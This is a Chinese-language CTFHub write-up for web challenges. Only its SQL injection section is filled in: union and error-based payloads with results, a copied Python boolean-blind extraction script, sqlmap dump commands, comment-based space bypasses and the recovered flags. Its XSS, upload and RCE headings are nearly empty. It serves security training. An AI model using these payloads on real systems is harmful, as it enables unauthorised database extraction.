CTFHub web部分题解
web
SQL注入
整数型注入
select * from news where id=1
ID: 1
Data: ctfhub
select * from news where id=65535 union select 1,database()
ID: 1
Data: sqli
select * from news where id=65535 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
ID: 1
Data: news,flag
select * from news where id=65535 union select 2,group_concat(column_name) from information_schema.columns where table_name="flag"
ID: 2
Data: flag
select * from news where id=65535 union select 1,flag from sqli.flag
ID: 1
Data: ctfhub{b4e5f56292df47714a3505cb8e7db7ec3841564e}
字符型注入
select * from news where id='65535' union select 1,database()#
ID: 1
Data: sqli
select * from news where id='65535' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#'
ID: 1
Data: news,flag
select * from news where id='65535' union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#'
ID: 1
Data: flag
select * from news where id='65535' union select 1,flag from sqli.flag#'
ID: 1
Data: ctfhub{55f091a136f1d09a3a47a0199345ec740f1b19bb}
报错注入
select * from news where id=1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry 'sqli&1' for key 'group_key'
select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry 'news&1' for key 'group_key'
select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry 'flag&1' for key 'group_key'
select * from news where id=1 union select count(*),concat((select column_name from information_schema.columns where table_name="flag" limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry 'flag&1' for key 'group_key'
select * from news where id=id=1 union select count(*),concat((select flag from sqli.flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry 'ctfhub{1485dddbf741f771c95612e0c824f68e50e4ebaf}&1' for key 'group_key'
布尔盲注
https://blog.csdn.net/weixin_44732566/article/details/104417351
抄的脚本
import requests
import time
urlOPEN = 'http://challenge-ef71d5f8c726bea8.sandbox.ctfhub.com:10080/?id='
starOperatorTime = []
mark = 'query_success'
def database_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
# print(url+'%23')
r = requests.get(url)
if mark in r.text:
name = name+i
print(name)
break
print('database_name:',name)
database_name()
def table_name():
list = []
for k in range(0,4):
name=''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
# print(url+'%23')
r = requests.get(url)
if mark in r.text:
name = name+i
break
list.append(name)
print('table_name:',list)
#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间: " + str(sum(starOperatorTime)/100))
def column_name():
list = []
for k in range(0,3): #判断表里最多有4个字段
name=''
for j in range(1,9): #判断一个 字段名最多有9个字符组成
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
r=requests.get(url)
if mark in r.text:
name=name+i
break
list.append(name)
print ('column_name:',list)
column_name()
def get_data():
name=''
for j in range(1,50): #判断一个值最多有51个字符组成
for i in range(48,126):
url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
r=requests.get(url)
if mark in r.text:
name=name+chr(i)
print(name)
break
print ('value:',name)
get_data()
时间盲注
https://www.cnblogs.com/0yst3r-2046/p/12486654.html
python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 --dbs
available databases [4]:
[*] information_schema [*] mysql
[*] performance_schema [*] sqli
python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+
python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump
Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100) |
+--------+--------------+
Database: sqli
Table: flag
[1 entry]
+--------------------------------------------------+
| flag |
+--------------------------------------------------+
| ctfhub{1b434bc37227050f91a3c6d89839c3d46caddc27} |
+--------------------------------------------------+
MySQL结构
python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 --dbs
available databases [4]:
[*] information_schema [*] mysql
[*] performance_schema [*] sqli
Database: sqli
[2 tables]
+------------+
| news |
| yqoedxnbyv |
+------------+
python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -Tyqoedxnbyv --columns
Database: sqli
Table: yqoedxnbyv
[1 column]
+------------+--------------+
| Column | Type |
+------------+--------------+
| xlmnukvowy | varchar(100) |
+------------+--------------+
python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T yqoedxnbyv --columns --dump
Database: sqli
Table: yqoedxnbyv
[1 entry]
+--------------------------------------------------+
| xlmnukvowy |
+--------------------------------------------------+
| ctfhub{f1a6d4ca1299a361ac6c24a3467eacad28e33462} |
+--------------------------------------------------+
Cookie注入
https://www.cnblogs.com/0yst3r-2046/p/12493132.html
python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" --dbs --level 2
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli
python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -D sqli --tables --level 2
Database: sqli
[2 tables]
+------------+
| news |
| ylhikalyfo |
+------------+
python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -T ylhikalyfo --columns --dump --level 2
Database: sqli
Table: ylhikalyfo
[1 entry]
+--------------------------------------------------+
| purywifqom |
+--------------------------------------------------+
| ctfhub{9fdae54dfbd16b2b8e8362efaa630d2e837ae597} |
+--------------------------------------------------+
UA注入
python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli
python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables
Database: sqli
[2 tables]
+------------+
| news |
| stjztvvqvb |
+------------+
python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -T stjztvvqvb --columns --dump
Database: sqli
Table: stjztvvqvb
[1 entry]
+--------------------------------------------------+
| wckzncyvgh |
+--------------------------------------------------+
| ctfhub{0103df815affd10439bf1ed48520d8f39618e590} |
+--------------------------------------------------+
Refer注入
python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli
python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
Database: sqli
[2 tables]
+---------+
| 2ews |
| hfuiwsi |
+---------+
python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T hfuiwsiotm --columns
Database: sqli
Table: hfuiwsiotm
[1 column]
+------------+--------------+
| Column | Type |
+------------+--------------+
| zuzhumkhnd | varchar(100) |
+------------+--------------+
python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T hfuiwsiotm -C zuzhumkhnd --dump
Database: sqli
Table: hfuiwsiotm
[1 entry]
+--------------------------------------------------+
| zuzhumkhnd |
+--------------------------------------------------+
| ctfhub{d61711c950c746b5cc93caaf5ae33c1dfd2f1cd0} |
+--------------------------------------------------+
过滤空格
https://www.cnblogs.com/anweilx/p/13156216.html
65535/**/union/**/select/**/1,database()ID: 1
Data: sqli
65535/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
ID: 1
Data: zzmpdgadiv,news
65535/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="zzmpdgadiv"
ID: 1
Data: bxphkegikc
65535/**/union/**/select/**/1,bxphkegikc/**/from/**/zzmpdgadiv
ID: 1
Data: ctfhub{93c21f537ae0bd573387788c7c4e1bf71e64d233}
XSS
反射型
参考链接:https://blog.csdn.net/solitudi/article/details/107544165
文件上传
无验证
前端验证
.htaccess
MIME绕过
00截断
双写后缀
文件头检查
RCE
eval执行
文件包含
php://input
读取源代码
远程包含
